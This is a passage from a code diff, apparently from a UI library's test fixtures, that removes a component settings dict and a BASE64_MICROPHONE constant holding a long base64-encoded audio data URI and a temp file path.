"elem_id": None, - "interactive": None, - "visible": True, -} -BASE64_MICROPHONE = { - "name": "/var/folders/t1/j7cmtcgd0mx43jh9nj_r9mmw0000gn/T/audiovb4gqjpc.wav", - "data": "data:audio/wav;base64,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